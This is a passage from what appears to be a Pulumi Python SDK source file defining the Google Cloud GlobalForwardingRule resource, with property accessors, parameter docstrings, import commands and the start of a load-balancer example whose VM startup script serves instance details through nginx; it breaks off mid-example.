:param pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]] metadata_filters: Opaque filter criteria used by Loadbalancer to restrict routing
configuration to a limited set xDS compliant clients. In their xDS
requests to Loadbalancer, xDS clients present node metadata. If a
match takes place, the relevant routing configuration is made available
to those proxies.
For each metadataFilter in this list, if its filterMatchCriteria is set
to MATCH_ANY, at least one of the filterLabels must match the
corresponding label provided in the metadata. If its filterMatchCriteria
is set to MATCH_ALL, then all of its filterLabels must match with
corresponding labels in the provided metadata.
metadataFilters specified here can be overridden by those specified in
the UrlMap that this ForwardingRule references.
metadataFilters only applies to Loadbalancers that have their
loadBalancingScheme set to INTERNAL_SELF_MANAGED.
Structure is documented below.
:param pulumi.Input[str] name: Name of the metadata label. The length must be between
1 and 1024 characters, inclusive.
:param pulumi.Input[str] network: This field is not used for external load balancing.
For INTERNAL_SELF_MANAGED load balancing, this field
identifies the network that the load balanced IP should belong to
for this global forwarding rule. If this field is not specified,
the default network will be used.
:param pulumi.Input[str] port_range: This field is used along with the target field for TargetHttpProxy,
TargetHttpsProxy, TargetSslProxy, TargetTcpProxy, TargetVpnGateway,
TargetPool, TargetInstance.
Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets
addressed to ports in the specified range will be forwarded to target.
Forwarding rules with the same [IPAddress, IPProtocol] pair must have
disjoint port ranges.
Some types of forwarding target have constraints on the acceptable
ports:
* TargetHttpProxy: 80, 8080
* TargetHttpsProxy: 443
* TargetTcpProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetSslProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetVpnGateway: 500, 4500
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
pulumi.set(__self__, "target", target)
if description is not None:
pulumi.set(__self__, "description", description)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if ip_protocol is not None:
pulumi.set(__self__, "ip_protocol", ip_protocol)
if ip_version is not None:
pulumi.set(__self__, "ip_version", ip_version)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if load_balancing_scheme is not None:
pulumi.set(__self__, "load_balancing_scheme", load_balancing_scheme)
if metadata_filters is not None:
pulumi.set(__self__, "metadata_filters", metadata_filters)
if name is not None:
pulumi.set(__self__, "name", name)
if network is not None:
pulumi.set(__self__, "network", network)
if port_range is not None:
pulumi.set(__self__, "port_range", port_range)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter
def target(self) -> pulumi.Input[str]:
"""
The URL of the target resource to receive the matched traffic.
The forwarded traffic must be of a type appropriate to the target object.
For INTERNAL_SELF_MANAGED load balancing, only HTTP and HTTPS targets
are valid.
For global address with a purpose of PRIVATE_SERVICE_CONNECT and
addressType of INTERNAL, only "all-apis" and "vpc-sc" are valid.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: pulumi.Input[str]):
pulumi.set(self, "target", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource. Provide this property when
you create the resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The IP address that this forwarding rule serves. When a client sends
traffic to this IP address, the forwarding rule directs the traffic to
the target that you specify in the forwarding rule. The
loadBalancingScheme and the forwarding rule's target determine the
type of IP address that you can use. For detailed information, refer
to [IP address specifications](https://cloud.google.com/load-balancing/docs/forwarding-rule-concepts#ip_address_specifications).
An address can be specified either by a literal IP address or a
reference to an existing Address resource. If you don't specify a
reserved IP address, an ephemeral IP address is assigned.
The value must be set to 0.0.0.0 when the target is a targetGrpcProxy
that has validateForProxyless field set to true.
For Private Service Connect forwarding rules that forward traffic to
Google APIs, IP address must be provided.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="ipProtocol")
def ip_protocol(self) -> Optional[pulumi.Input[str]]:
"""
The IP protocol to which this rule applies. When the load balancing scheme is
INTERNAL_SELF_MANAGED, only TCP is valid. This field must not be set if the
global address is configured as a purpose of PRIVATE_SERVICE_CONNECT
and addressType of INTERNAL
Possible values are `TCP`, `UDP`, `ESP`, `AH`, `SCTP`, and `ICMP`.
"""
return pulumi.get(self, "ip_protocol")
@ip_protocol.setter
def ip_protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_protocol", value)
@property
@pulumi.getter(name="ipVersion")
def ip_version(self) -> Optional[pulumi.Input[str]]:
"""
The IP Version that will be used by this global forwarding rule.
Possible values are `IPV4` and `IPV6`.
"""
return pulumi.get(self, "ip_version")
@ip_version.setter
def ip_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_version", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Labels to apply to this forwarding rule. A list of key->value pairs.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="loadBalancingScheme")
def load_balancing_scheme(self) -> Optional[pulumi.Input[str]]:
"""
This signifies what the GlobalForwardingRule will be used for.
The value of INTERNAL_SELF_MANAGED means that this will be used for
Internal Global HTTP(S) LB. The value of EXTERNAL means that this
will be used for External Global Load Balancing (HTTP(S) LB,
External TCP/UDP LB, SSL Proxy)
Note: This field must be set "" if the global address is
configured as a purpose of PRIVATE_SERVICE_CONNECT and addressType of INTERNAL.
Default value is `EXTERNAL`.
Possible values are `EXTERNAL` and `INTERNAL_SELF_MANAGED`.
"""
return pulumi.get(self, "load_balancing_scheme")
@load_balancing_scheme.setter
def load_balancing_scheme(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancing_scheme", value)
@property
@pulumi.getter(name="metadataFilters")
def metadata_filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]]]:
"""
Opaque filter criteria used by Loadbalancer to restrict routing
configuration to a limited set xDS compliant clients. In their xDS
requests to Loadbalancer, xDS clients present node metadata. If a
match takes place, the relevant routing configuration is made available
to those proxies.
For each metadataFilter in this list, if its filterMatchCriteria is set
to MATCH_ANY, at least one of the filterLabels must match the
corresponding label provided in the metadata. If its filterMatchCriteria
is set to MATCH_ALL, then all of its filterLabels must match with
corresponding labels in the provided metadata.
metadataFilters specified here can be overridden by those specified in
the UrlMap that this ForwardingRule references.
metadataFilters only applies to Loadbalancers that have their
loadBalancingScheme set to INTERNAL_SELF_MANAGED.
Structure is documented below.
"""
return pulumi.get(self, "metadata_filters")
@metadata_filters.setter
def metadata_filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]]]):
pulumi.set(self, "metadata_filters", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the metadata label. The length must be between
1 and 1024 characters, inclusive.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
This field is not used for external load balancing.
For INTERNAL_SELF_MANAGED load balancing, this field
identifies the network that the load balanced IP should belong to
for this global forwarding rule. If this field is not specified,
the default network will be used.
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="portRange")
def port_range(self) -> Optional[pulumi.Input[str]]:
"""
This field is used along with the target field for TargetHttpProxy,
TargetHttpsProxy, TargetSslProxy, TargetTcpProxy, TargetVpnGateway,
TargetPool, TargetInstance.
Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets
addressed to ports in the specified range will be forwarded to target.
Forwarding rules with the same [IPAddress, IPProtocol] pair must have
disjoint port ranges.
Some types of forwarding target have constraints on the acceptable
ports:
* TargetHttpProxy: 80, 8080
* TargetHttpsProxy: 443
* TargetTcpProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetSslProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetVpnGateway: 500, 4500
"""
return pulumi.get(self, "port_range")
@port_range.setter
def port_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "port_range", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _GlobalForwardingRuleState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
ip_protocol: Optional[pulumi.Input[str]] = None,
ip_version: Optional[pulumi.Input[str]] = None,
label_fingerprint: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
load_balancing_scheme: Optional[pulumi.Input[str]] = None,
metadata_filters: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
port_range: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering GlobalForwardingRule resources.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when
you create the resource.
:param pulumi.Input[str] ip_address: The IP address that this forwarding rule serves. When a client sends
traffic to this IP address, the forwarding rule directs the traffic to
the target that you specify in the forwarding rule. The
loadBalancingScheme and the forwarding rule's target determine the
type of IP address that you can use. For detailed information, refer
to [IP address specifications](https://cloud.google.com/load-balancing/docs/forwarding-rule-concepts#ip_address_specifications).
An address can be specified either by a literal IP address or a
reference to an existing Address resource. If you don't specify a
reserved IP address, an ephemeral IP address is assigned.
The value must be set to 0.0.0.0 when the target is a targetGrpcProxy
that has validateForProxyless field set to true.
For Private Service Connect forwarding rules that forward traffic to
Google APIs, IP address must be provided.
:param pulumi.Input[str] ip_protocol: The IP protocol to which this rule applies. When the load balancing scheme is
INTERNAL_SELF_MANAGED, only TCP is valid. This field must not be set if the
global address is configured as a purpose of PRIVATE_SERVICE_CONNECT
and addressType of INTERNAL
Possible values are `TCP`, `UDP`, `ESP`, `AH`, `SCTP`, and `ICMP`.
:param pulumi.Input[str] ip_version: The IP Version that will be used by this global forwarding rule.
Possible values are `IPV4` and `IPV6`.
:param pulumi.Input[str] label_fingerprint: Used internally during label updates.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this forwarding rule. A list of key->value pairs.
:param pulumi.Input[str] load_balancing_scheme: This signifies what the GlobalForwardingRule will be used for.
The value of INTERNAL_SELF_MANAGED means that this will be used for
Internal Global HTTP(S) LB. The value of EXTERNAL means that this
will be used for External Global Load Balancing (HTTP(S) LB,
External TCP/UDP LB, SSL Proxy)
Note: This field must be set "" if the global address is
configured as a purpose of PRIVATE_SERVICE_CONNECT and addressType of INTERNAL.
Default value is `EXTERNAL`.
Possible values are `EXTERNAL` and `INTERNAL_SELF_MANAGED`.
:param pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]] metadata_filters: Opaque filter criteria used by Loadbalancer to restrict routing
configuration to a limited set xDS compliant clients. In their xDS
requests to Loadbalancer, xDS clients present node metadata. If a
match takes place, the relevant routing configuration is made available
to those proxies.
For each metadataFilter in this list, if its filterMatchCriteria is set
to MATCH_ANY, at least one of the filterLabels must match the
corresponding label provided in the metadata. If its filterMatchCriteria
is set to MATCH_ALL, then all of its filterLabels must match with
corresponding labels in the provided metadata.
metadataFilters specified here can be overridden by those specified in
the UrlMap that this ForwardingRule references.
metadataFilters only applies to Loadbalancers that have their
loadBalancingScheme set to INTERNAL_SELF_MANAGED.
Structure is documented below.
:param pulumi.Input[str] name: Name of the metadata label. The length must be between
1 and 1024 characters, inclusive.
:param pulumi.Input[str] network: This field is not used for external load balancing.
For INTERNAL_SELF_MANAGED load balancing, this field
identifies the network that the load balanced IP should belong to
for this global forwarding rule. If this field is not specified,
the default network will be used.
:param pulumi.Input[str] port_range: This field is used along with the target field for TargetHttpProxy,
TargetHttpsProxy, TargetSslProxy, TargetTcpProxy, TargetVpnGateway,
TargetPool, TargetInstance.
Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets
addressed to ports in the specified range will be forwarded to target.
Forwarding rules with the same [IPAddress, IPProtocol] pair must have
disjoint port ranges.
Some types of forwarding target have constraints on the acceptable
ports:
* TargetHttpProxy: 80, 8080
* TargetHttpsProxy: 443
* TargetTcpProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetSslProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetVpnGateway: 500, 4500
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] self_link: The URI of the created resource.
:param pulumi.Input[str] target: The URL of the target resource to receive the matched traffic.
The forwarded traffic must be of a type appropriate to the target object.
For INTERNAL_SELF_MANAGED load balancing, only HTTP and HTTPS targets
are valid.
For global address with a purpose of PRIVATE_SERVICE_CONNECT and
addressType of INTERNAL, only "all-apis" and "vpc-sc" are valid.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if ip_protocol is not None:
pulumi.set(__self__, "ip_protocol", ip_protocol)
if ip_version is not None:
pulumi.set(__self__, "ip_version", ip_version)
if label_fingerprint is not None:
pulumi.set(__self__, "label_fingerprint", label_fingerprint)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if load_balancing_scheme is not None:
pulumi.set(__self__, "load_balancing_scheme", load_balancing_scheme)
if metadata_filters is not None:
pulumi.set(__self__, "metadata_filters", metadata_filters)
if name is not None:
pulumi.set(__self__, "name", name)
if network is not None:
pulumi.set(__self__, "network", network)
if port_range is not None:
pulumi.set(__self__, "port_range", port_range)
if project is not None:
pulumi.set(__self__, "project", project)
if self_link is not None:
pulumi.set(__self__, "self_link", self_link)
if target is not None:
pulumi.set(__self__, "target", target)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource. Provide this property when
you create the resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The IP address that this forwarding rule serves. When a client sends
traffic to this IP address, the forwarding rule directs the traffic to
the target that you specify in the forwarding rule. The
loadBalancingScheme and the forwarding rule's target determine the
type of IP address that you can use. For detailed information, refer
to [IP address specifications](https://cloud.google.com/load-balancing/docs/forwarding-rule-concepts#ip_address_specifications).
An address can be specified either by a literal IP address or a
reference to an existing Address resource. If you don't specify a
reserved IP address, an ephemeral IP address is assigned.
The value must be set to 0.0.0.0 when the target is a targetGrpcProxy
that has validateForProxyless field set to true.
For Private Service Connect forwarding rules that forward traffic to
Google APIs, IP address must be provided.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="ipProtocol")
def ip_protocol(self) -> Optional[pulumi.Input[str]]:
"""
The IP protocol to which this rule applies. When the load balancing scheme is
INTERNAL_SELF_MANAGED, only TCP is valid. This field must not be set if the
global address is configured as a purpose of PRIVATE_SERVICE_CONNECT
and addressType of INTERNAL
Possible values are `TCP`, `UDP`, `ESP`, `AH`, `SCTP`, and `ICMP`.
"""
return pulumi.get(self, "ip_protocol")
@ip_protocol.setter
def ip_protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_protocol", value)
@property
@pulumi.getter(name="ipVersion")
def ip_version(self) -> Optional[pulumi.Input[str]]:
"""
The IP Version that will be used by this global forwarding rule.
Possible values are `IPV4` and `IPV6`.
"""
return pulumi.get(self, "ip_version")
@ip_version.setter
def ip_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_version", value)
@property
@pulumi.getter(name="labelFingerprint")
def label_fingerprint(self) -> Optional[pulumi.Input[str]]:
"""
Used internally during label updates.
"""
return pulumi.get(self, "label_fingerprint")
@label_fingerprint.setter
def label_fingerprint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label_fingerprint", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Labels to apply to this forwarding rule. A list of key->value pairs.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="loadBalancingScheme")
def load_balancing_scheme(self) -> Optional[pulumi.Input[str]]:
"""
This signifies what the GlobalForwardingRule will be used for.
The value of INTERNAL_SELF_MANAGED means that this will be used for
Internal Global HTTP(S) LB. The value of EXTERNAL means that this
will be used for External Global Load Balancing (HTTP(S) LB,
External TCP/UDP LB, SSL Proxy)
Note: This field must be set "" if the global address is
configured as a purpose of PRIVATE_SERVICE_CONNECT and addressType of INTERNAL.
Default value is `EXTERNAL`.
Possible values are `EXTERNAL` and `INTERNAL_SELF_MANAGED`.
"""
return pulumi.get(self, "load_balancing_scheme")
@load_balancing_scheme.setter
def load_balancing_scheme(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancing_scheme", value)
@property
@pulumi.getter(name="metadataFilters")
def metadata_filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]]]:
"""
Opaque filter criteria used by Loadbalancer to restrict routing
configuration to a limited set xDS compliant clients. In their xDS
requests to Loadbalancer, xDS clients present node metadata. If a
match takes place, the relevant routing configuration is made available
to those proxies.
For each metadataFilter in this list, if its filterMatchCriteria is set
to MATCH_ANY, at least one of the filterLabels must match the
corresponding label provided in the metadata. If its filterMatchCriteria
is set to MATCH_ALL, then all of its filterLabels must match with
corresponding labels in the provided metadata.
metadataFilters specified here can be overridden by those specified in
the UrlMap that this ForwardingRule references.
metadataFilters only applies to Loadbalancers that have their
loadBalancingScheme set to INTERNAL_SELF_MANAGED.
Structure is documented below.
"""
return pulumi.get(self, "metadata_filters")
@metadata_filters.setter
def metadata_filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]]]):
pulumi.set(self, "metadata_filters", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the metadata label. The length must be between
1 and 1024 characters, inclusive.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
This field is not used for external load balancing.
For INTERNAL_SELF_MANAGED load balancing, this field
identifies the network that the load balanced IP should belong to
for this global forwarding rule. If this field is not specified,
the default network will be used.
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="portRange")
def port_range(self) -> Optional[pulumi.Input[str]]:
    """
    Used together with the target field for TargetHttpProxy,
    TargetHttpsProxy, TargetSslProxy, TargetTcpProxy, TargetVpnGateway,
    TargetPool, TargetInstance.
    Only applicable when IPProtocol is TCP, UDP, or SCTP: only packets
    addressed to ports in the specified range are forwarded to the target.
    Forwarding rules sharing the same [IPAddress, IPProtocol] pair must use
    disjoint port ranges.
    Some forwarding target types constrain the acceptable ports:
    * TargetHttpProxy: 80, 8080
    * TargetHttpsProxy: 443
    * TargetTcpProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
    1883, 5222
    * TargetSslProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
    1883, 5222
    * TargetVpnGateway: 500, 4500
    """
    return pulumi.get(self, "port_range")
@port_range.setter
def port_range(self, value: Optional[pulumi.Input[str]]):
    """Set the port range."""
    pulumi.set(self, "port_range", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
    """
    The ID of the project in which the resource belongs; falls back to the
    provider's project when not provided.
    """
    return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
    """Set the project ID."""
    pulumi.set(self, "project", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
    """
    URI of the created resource.
    """
    return pulumi.get(self, "self_link")
@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
    """Set the self link URI."""
    pulumi.set(self, "self_link", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
    """
    The URL of the target resource that receives the matched traffic; the
    forwarded traffic must be of a type appropriate to the target object.
    For INTERNAL_SELF_MANAGED load balancing, only HTTP and HTTPS targets
    are valid.
    For a global address with purpose PRIVATE_SERVICE_CONNECT and
    addressType INTERNAL, only "all-apis" and "vpc-sc" are valid.
    """
    return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
    """Set the target URL."""
    pulumi.set(self, "target", value)
class GlobalForwardingRule(pulumi.CustomResource):
@overload
def __init__(__self__,
             resource_name: str,
             opts: Optional[pulumi.ResourceOptions] = None,
             description: Optional[pulumi.Input[str]] = None,
             ip_address: Optional[pulumi.Input[str]] = None,
             ip_protocol: Optional[pulumi.Input[str]] = None,
             ip_version: Optional[pulumi.Input[str]] = None,
             labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
             load_balancing_scheme: Optional[pulumi.Input[str]] = None,
             metadata_filters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GlobalForwardingRuleMetadataFilterArgs']]]]] = None,
             name: Optional[pulumi.Input[str]] = None,
             network: Optional[pulumi.Input[str]] = None,
             port_range: Optional[pulumi.Input[str]] = None,
             project: Optional[pulumi.Input[str]] = None,
             target: Optional[pulumi.Input[str]] = None,
             __props__=None):
    """
    Represents a GlobalForwardingRule resource. Global forwarding rules are
    used to forward traffic to the correct load balancer for HTTP load
    balancing, and can only be used for HTTP load balancing.
    For more information, see
    https://cloud.google.com/compute/docs/load-balancing/http/

    ## Example Usage

    See the provider documentation for complete examples, including external
    TCP/HTTP proxy load balancers with managed-instance-group backends and
    custom headers, internal (INTERNAL_SELF_MANAGED) rules with metadata
    filters, and Private Service Connect rules targeting Google APIs.

    ## Import

    GlobalForwardingRule can be imported using any of these accepted formats

    ```sh
    $ pulumi import gcp:compute/globalForwardingRule:GlobalForwardingRule default projects/{{project}}/global/forwardingRules/{{name}}
    ```

    ```sh
    $ pulumi import gcp:compute/globalForwardingRule:GlobalForwardingRule default {{project}}/{{name}}
    ```

    ```sh
    $ pulumi import gcp:compute/globalForwardingRule:GlobalForwardingRule default {{name}}
    ```

    :param str resource_name: The name of the resource.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] description: An optional description of this resource. Provide this property when
           you create the resource.
    :param pulumi.Input[str] ip_address: The IP address that this forwarding rule serves, specified either as a
           literal IP address or a reference to an existing Address resource; an
           ephemeral IP is assigned when no reserved address is given. Which kinds of
           address are acceptable depends on loadBalancingScheme and the rule's
           target — see
           [IP address specifications](https://cloud.google.com/load-balancing/docs/forwarding-rule-concepts#ip_address_specifications).
           Must be 0.0.0.0 when the target is a targetGrpcProxy with
           validateForProxyless set to true, and must be provided for Private
           Service Connect rules that forward traffic to Google APIs.
    :param pulumi.Input[str] ip_protocol: The IP protocol to which this rule applies. Only TCP is valid when the
           load balancing scheme is INTERNAL_SELF_MANAGED; must not be set when the
           global address has purpose PRIVATE_SERVICE_CONNECT and addressType
           INTERNAL.
           Possible values are `TCP`, `UDP`, `ESP`, `AH`, `SCTP`, and `ICMP`.
    :param pulumi.Input[str] ip_version: The IP Version that will be used by this global forwarding rule.
           Possible values are `IPV4` and `IPV6`.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this forwarding rule. A list of key->value pairs.
    :param pulumi.Input[str] load_balancing_scheme: What the GlobalForwardingRule will be used for:
           INTERNAL_SELF_MANAGED for Internal Global HTTP(S) LB, EXTERNAL for
           External Global Load Balancing (HTTP(S) LB, External TCP/UDP LB,
           SSL Proxy).
           Note: must be set to "" when the global address has purpose
           PRIVATE_SERVICE_CONNECT and addressType INTERNAL.
           Default value is `EXTERNAL`.
           Possible values are `EXTERNAL` and `INTERNAL_SELF_MANAGED`.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GlobalForwardingRuleMetadataFilterArgs']]]] metadata_filters: Opaque filter criteria used by the Loadbalancer to restrict this
           routing configuration to a limited set of xDS-compliant clients that
           present matching node metadata (MATCH_ANY: at least one filterLabel
           matches; MATCH_ALL: every filterLabel matches). Filters here can be
           overridden by those in the referenced UrlMap, and only apply when
           loadBalancingScheme is INTERNAL_SELF_MANAGED.
           Structure is documented below.
    :param pulumi.Input[str] name: Name of the metadata label. The length must be between
           1 and 1024 characters, inclusive.
    :param pulumi.Input[str] network: For INTERNAL_SELF_MANAGED load balancing, the network that the load
           balanced IP should belong to for this global forwarding rule; defaults
           to the default network when unspecified. Not used for external load
           balancing.
    :param pulumi.Input[str] port_range: Used with the target field for TargetHttpProxy, TargetHttpsProxy,
           TargetSslProxy, TargetTcpProxy, TargetVpnGateway, TargetPool,
           TargetInstance. Only applicable when IPProtocol is TCP, UDP, or SCTP:
           only packets addressed to ports in the specified range are forwarded.
           Rules with the same [IPAddress, IPProtocol] pair must have disjoint
           port ranges. Some target types constrain the acceptable ports:
           * TargetHttpProxy: 80, 8080
           * TargetHttpsProxy: 443
           * TargetTcpProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
           1883, 5222
           * TargetSslProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
           1883, 5222
           * TargetVpnGateway: 500, 4500
    :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
           If it is not provided, the provider project is used.
    :param pulumi.Input[str] target: The URL of the target resource to receive the matched traffic; the
           forwarded traffic must be of a type appropriate to the target object.
           Only HTTP and HTTPS targets are valid for INTERNAL_SELF_MANAGED load
           balancing; only "all-apis" and "vpc-sc" are valid for a global address
           with purpose PRIVATE_SERVICE_CONNECT and addressType INTERNAL.
    """
    ...
@overload
def __init__(__self__,
resource_name: str,
args: GlobalForwardingRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Represents a GlobalForwardingRule resource. Global forwarding rules are
used to forward traffic to the correct load balancer for HTTP load
balancing. Global forwarding rules can only be used for HTTP load
balancing.
For more information, see
https://cloud.google.com/compute/docs/load-balancing/http/
## Example Usage
### External Tcp Proxy Lb Mig Backend Custom Header
```python
import pulumi
import pulumi_gcp as gcp
# External TCP proxy load balancer with managed instance group backend
# VPC
default_network = gcp.compute.Network("defaultNetwork", auto_create_subnetworks=False,
opts=pulumi.ResourceOptions(provider=google_beta))
# backend subnet
default_subnetwork = gcp.compute.Subnetwork("defaultSubnetwork",
ip_cidr_range="10.0.1.0/24",
region="us-central1",
network=default_network.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# reserved IP address
default_global_address = gcp.compute.GlobalAddress("defaultGlobalAddress", opts=pulumi.ResourceOptions(provider=google_beta))
default_health_check = gcp.compute.HealthCheck("defaultHealthCheck",
timeout_sec=1,
check_interval_sec=1,
tcp_health_check=gcp.compute.HealthCheckTcpHealthCheckArgs(
port=80,
),
opts=pulumi.ResourceOptions(provider=google_beta))
# instance template
default_instance_template = gcp.compute.InstanceTemplate("defaultInstanceTemplate",
machine_type="e2-small",
tags=["allow-health-check"],
network_interfaces=[gcp.compute.InstanceTemplateNetworkInterfaceArgs(
network=default_network.id,
subnetwork=default_subnetwork.id,
access_configs=[gcp.compute.InstanceTemplateNetworkInterfaceAccessConfigArgs()],
)],
disks=[gcp.compute.InstanceTemplateDiskArgs(
source_image="debian-cloud/debian-10",
auto_delete=True,
boot=True,
)],
metadata={
"startup-script": \"\"\"#! /bin/bash
set -euo pipefail
export DEBIAN_FRONTEND=noninteractive
apt-get update
apt-get install -y nginx-light jq
NAME=$(curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/hostname")
IP=$(curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/0/ip")
METADATA=$(curl -f -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=True" | jq 'del(.["startup-script"])')
cat <<EOF > /var/www/html/index.html
<pre>
Name: $NAME
IP: $IP
Metadata: $METADATA
</pre>
EOF
\"\"\",
},
opts=pulumi.ResourceOptions(provider=google_beta))
# MIG
default_instance_group_manager = gcp.compute.InstanceGroupManager("defaultInstanceGroupManager",
zone="us-central1-c",
named_ports=[gcp.compute.InstanceGroupManagerNamedPortArgs(
name="tcp",
port=110,
)],
versions=[gcp.compute.InstanceGroupManagerVersionArgs(
instance_template=default_instance_template.id,
name="primary",
)],
base_instance_name="vm",
target_size=2,
opts=pulumi.ResourceOptions(provider=google_beta))
# backend service
default_backend_service = gcp.compute.BackendService("defaultBackendService",
